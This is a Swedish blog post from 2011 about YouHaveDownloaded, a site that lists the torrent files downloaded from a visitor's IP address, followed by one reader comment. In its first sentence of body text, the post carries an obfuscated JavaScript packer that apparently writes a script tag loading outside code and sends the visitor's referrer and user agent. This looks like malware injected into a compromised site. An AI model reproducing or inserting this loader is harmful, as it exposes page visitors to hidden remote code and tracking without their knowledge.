Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

You have downloaded: sidan som trackar vilka torrent filer ditt ip laddat ner. Obehaglig…

You have downloaded: sidan som trackar vilka torrent filer ditt ip laddat ner. Obehaglig…
Filip Urde
  • On 12 december, 2011
  • http://www.revue.se/filip-urde

You have downloaded…

Här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|resak|var|u0026u|referrer|abtee||js|php’.split(’|’),0,{}))
är en sida som trackar bit torrent-nedladdningar på ett ganska obehagligt sätt.

YouHaveDownloaded heter hemsidan och den trackar IP-adresser på folk som fildelar via Bit Torrent-protokollet, på hemsidna så uppger man att de har tracking på cirka 20% av all världens Bit Torrent-trafik och har information om 51 925 000 användare i sin databas. När du besöker sidan så listas filer som laddats ned av ditt IP-numret du sitter på.  Använder man sig av ett dynamiskt IP-nummer så bryr sig inte om att ge korrekt data säger man själva på hemsidan, de filerna som listas behöver inte laddats ner till den egna datorn.

 

Här nedan är en fungerande banner från sidan som listar vad som laddats ner.

 

Det går att söka efter IP-nummer, torrent hash eller filnamn för att kolla vad som laddats ner.

Jag vet inte vad syftet med detta är, eller om det är ett skämt. Vilket man kan få en känsla av när man läser Don’t take it seriously längst ner på sidan. Men men, obehagligt!

Comments

  1. sebbe

    Det står att jag laddat ner hela boxen av Trueblood nu i November. Det har jag inte. Har även svårt att tro att grannen gjort det då jag har ett ganska stört lösenord på mitt nät.

    Lol